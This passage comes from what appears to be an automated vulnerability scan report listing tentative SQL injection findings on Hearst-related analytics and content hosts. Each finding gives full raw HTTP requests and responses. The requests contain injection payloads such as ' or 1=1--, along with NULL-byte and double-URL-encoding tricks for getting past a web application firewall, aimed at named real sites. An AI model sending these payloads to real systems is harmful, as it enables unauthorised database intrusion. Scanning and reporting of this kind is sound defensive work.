Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 416
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/hcfellegirlprod/1 was not found on this server.
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/hcfellegirlprod/1%00''/H.15.1/s92564277239143?AQB=1&pccr=true&vidn=273A64F70516384F-40000181A003B62B&&ndh=1&t=17/8/2011%2016%3A26%3A30%206%20300&ns=hachettefilipacchi&pageName=eg%3Ahp%3Afront%3Apage%201&g=http%3A//ellegirl.elle.com/&r=http%3A//hearst.com/newspapers/metrix4media.php&cc=USD&events=event2&v2=eg%3Ahp%3Afront%3Apage%201&c3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&v3=Teen%20Fashion%20%u2013%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%u2013%20ELLEgirl.com&c6=eg%3Ahp&v6=eg%3Ahp&c7=eg%3Ahp&v7=eg%3Ahp&c8=http%3A//ellegirl.elle.com/&v8=http%3A//ellegirl.elle.com/&c11=5%3A00PM&v11=5%3A00PM&c12=Saturday&v12=Saturday&c13=Weekend&v13=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.elle.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-629399934-1316294790891; s_vi=[CS]v1|273A64F70516384F-40000181A003B62B[CE]

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 16:49:42 GMT
Server: Omniture DC/2.0.0
xserver: www409
Content-Length: 0
Content-Type: text/html

1.18. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s92442379223648 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.seattlepi.com
Path:   /b/ss/hearstseattlepi/1/H.21/s92442379223648

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/hearstseattlepi/1/H.21/s92442379223648?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A24%206%20300&ce=UTF-8&ns=hearst&g=http%3A//www.seattlepi.com/flashtalking/ftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A//mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26&r=http%3A//www.seattlepi.com/&cc=USD&pageType=errorPage&events=event16&c12=New&v12=New&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=300&bh=250&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295384437-New%7C1318887384437%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:02:42 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/hearstseattlepi/1/H.21/s92442379223648?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A24%206%20300&ce=UTF-8&ns=hearst&g=http%3A//www.seattlepi.com/flashtalking/ftlocal.html%3Fifsrc%3Dhttp%253A%252F%252Fa.flashtalking.com%252Fxre%252F18%252F189583%252F237666%252Fjs%252Fj-189583-237666.js%26click%3Dhttp%3A//mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%253f%26ftx%3D%26fty%3D%26ftadz%3D%26ftscw%3D%26&r=http%3A//www.seattlepi.com/&cc=USD&pageType=errorPage&events=event16&c12=New&v12=New&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=300&bh=250&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB25_27703F6F_10686B6%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=272524.66208301485%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295384437-New%7C1318887384437%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:02:42 GMT
Server: Omniture DC/2.0.0
xserver: www600
Content-Length: 0
Content-Type: text/html

1.19. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s94189070519059 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.seattlepi.com
Path:   /b/ss/hearstseattlepi/1/H.21/s94189070519059

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /b%2527/ss/hearstseattlepi/1/H.21/s94189070519059?AQB=1&ndh=1&t=17/8/2011%2016%3A42%3A7%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; __qca=P0-1682088852-1316295406495; s_pers=%20s_nr%3D1316295727539-New%7C1318887727539%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:26:41 GMT
Server: Omniture DC/2.0.0
Content-Length: 445
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b%27/ss/hearstseattlepi/1/H.21/s94189070519059 was n
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%2527%2527/ss/hearstseattlepi/1/H.21/s94189070519059?AQB=1&ndh=1&t=17/8/2011%2016%3A42%3A7%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.3.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; __qca=P0-1682088852-1316295406495; s_pers=%20s_nr%3D1316295727539-New%7C1318887727539%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:26:40 GMT
Server: Omniture DC/2.0.0
xserver: www617
Content-Length: 0
Content-Type: text/html

1.20. http://metrics.seattlepi.com/b/ss/hearstseattlepi/1/H.21/s98951816044282 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.seattlepi.com
Path:   /b/ss/hearstseattlepi/1/H.21/s98951816044282

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/hearstseattlepi%00'/1/H.21/s98951816044282?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A10%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.2.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:06:31 GMT
Server: Omniture DC/2.0.0
Content-Length: 419
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/hearstseattlepi was not found on this server.</
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/hearstseattlepi%00''/1/H.21/s98951816044282?AQB=1&ndh=1&t=17/8/2011%2016%3A36%3A10%206%20300&ce=UTF-8&ns=hearst&pageName=HomePage&g=http%3A//www.seattlepi.com/&r=http%3A//www.seattlepi.com/&cc=USD&ch=home&server=www.seattlepi.com&events=event16&c1=home&v1=home&h1=home&c2=home&v2=home&c3=home&v3=home&c4=home&v4=home&c12=New&v12=New&c13=HomePage&c16=online&c17=5%3A30PM&v17=5%3A30PM&c18=Saturday&v18=Saturday&c19=Weekend&v19=Weekend&c21=2010-12-14%2018%3A20%3A00&c22=Home&v22=Home&c23=5783&v23=5783&c24=home%20page&v24=home%20page&c28=http%3A//www.seattlepi.com/&v29=http%3A//www.seattlepi.com/&c42=http%3A//www.seattlepi.com/&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.seattlepi.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|273A64C30501329F-600001152039175F[CE]; adx=c174511@1316381121@1; __utma=129738766.992976107.1316294686.1316294686.1316294686.1; __utmb=129738766.2.10.1316294686; __utmc=129738766; __utmz=129738766.1316294686.1.1.utmcsr=hearst.com|utmccn=(referral)|utmcmd=referral|utmcct=/newspapers/seattlepicom.php; s_pers=%20s_nr%3D1316295370718-New%7C1318887370718%3B; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:06:31 GMT
Server: Omniture DC/2.0.0
xserver: www596
Content-Length: 0
Content-Type: text/html

1.21. http://syn.verticalacuity.com/varw/getPromo [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://syn.verticalacuity.com
Path:   /varw/getPromo

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10313007'%20or%201%3d1--%20 and 10313007'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /varw/getPromo?conId=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&fp=true&holdout=false&pUrl=http%3A%2F%2Fwww.ugo.com%2F&cb=1316294751737&tOff=-5&seq=1 HTTP/1.1
Host: syn.verticalacuity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=10313007'%20or%201%3d1--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 17 Sep 2011 16:32:03 GMT
Server: nginx
Content-Length: 1392
Connection: keep-alive

(function() {
   var BASE_URL = 'http://syn.verticalacuity.com/varw/';
   var dataVar = 'recData' || 'data';    
   var data = {"baseUrl":"http://syn.verticalacuity.com/varw/","dataVarName":"recData","d":[],"scripts":[],"styles":[],"siteEnabled":false};
   
   if(!window.VAData){window.VAData={}}window.VAData.dataVar=dataVar;window.VAData[dataVar]=data;(function(){var e=data.baseUrl;var i=document;var h="head";var b="?cb="+Math.round(new Date().getTime()/3600000);var d=function(j){try{for(var m=0;m<j.length;m++){var n=e+j[m];if(j[m].indexOf("http://")===0||j[m].indexOf("https://")===0){n=j[m]}var k=i.createElement("script");k.type="text/javascript";k.src=n+b;k.defer=true;((i.getElementsByTagName(h))[0]).appendChild(k)}}catch(l){}};var c=function(n){try{for(var l=0;l<n.length;l++){var j=e+n[l];if(n[l].indexOf("http://")===0||n[l].indexOf("https://")===0){j=n[l]}var m=i.createElement("link");m.rel="stylesheet";m.type="text/css";m.media="all";m.href=j+b;((i.getElementsByTagName(h))[0]).appendChild(m)}}catch(k){}};var f=function(){var n=document.domain.split("."),j=n.length,k=n;if(j>=2){var l=n[j-2]+"."+n[j-1];if(n[j-2]=="co"){l=n[j-3]+"."+l}k=l}var m="_vaNP=siteEnabled=false; path=/";m+=k!==null?"; domain="+k:"";i.cookie=m};try{if(data){if(data.siteEnabled==true){c(data.styles);d(data.scripts)}else{f()}}}catch(g){try{log("error","Failure in VAPromo: "+g.message)}catch(a){}}})();
})();

Request 2

GET /varw/getPromo?conId=5dfcbd14-8acb-492e-ab5d-382bd54ff582&cId=3yvaza&fp=true&holdout=false&pUrl=http%3A%2F%2Fwww.ugo.com%2F&cb=1316294751737&tOff=-5&seq=1 HTTP/1.1
Host: syn.verticalacuity.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=10313007'%20or%201%3d2--%20
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Sat, 17 Sep 2011 16:32:04 GMT
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Server: nginx
Set-Cookie: JSESSIONID=wz5uxs7ukadb1jau0zxh73neo;Path=/varw
Content-Length: 1392
Connection: keep-alive

(function() {
   var BASE_URL = 'http://syn.verticalacuity.com/varw/';
   var dataVar = 'recData' || 'data';    
   var data = {"baseUrl":"http://syn.verticalacuity.com/varw/","dataVarName":"recData","d":[],"scripts":[],"styles":[],"siteEnabled":false};
   
   if(!window.VAData){window.VAData={}}window.VAData.dataVar=dataVar;window.VAData[dataVar]=data;(function(){var e=data.baseUrl;var i=document;var h="head";var b="?cb="+Math.round(new Date().getTime()/3600000);var d=function(j){try{for(var m=0;m<j.length;m++){var n=e+j[m];if(j[m].indexOf("http://")===0||j[m].indexOf("https://")===0){n=j[m]}var k=i.createElement("script");k.type="text/javascript";k.src=n+b;k.defer=true;((i.getElementsByTagName(h))[0]).appendChild(k)}}catch(l){}};var c=function(n){try{for(var l=0;l<n.length;l++){var j=e+n[l];if(n[l].indexOf("http://")===0||n[l].indexOf("https://")===0){j=n[l]}var m=i.createElement("link");m.rel="stylesheet";m.type="text/css";m.media="all";m.href=j+b;((i.getElementsByTagName(h))[0]).appendChild(m)}}catch(k){}};var f=function(){var n=document.domain.split("."),j=n.length,k=n;if(j>=2){var l=n[j-2]+"."+n[j-1];if(n[j-2]=="co"){l=n[j-3]+"."+l}k=l}var m="_vaNP=siteEnabled=false; path=/";m+=k!==null?"; domain="+k:"";i.cookie=m};try{if(data){if(data.siteEnabled==true){c(data.styles);d(data.scripts)}else{f()}}}catch(g){try{log("error","Failure in VAPromo: "+g.message)}catch(a){}}})();
})();
1.22. http://www.answerology.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://hearst.com/newspapers/metrix4media.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:27:27 GMT
Content-Length: 58819
Connection: close
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Relationship Advice - Get Answers to Relationship Questions</title>
<meta name="
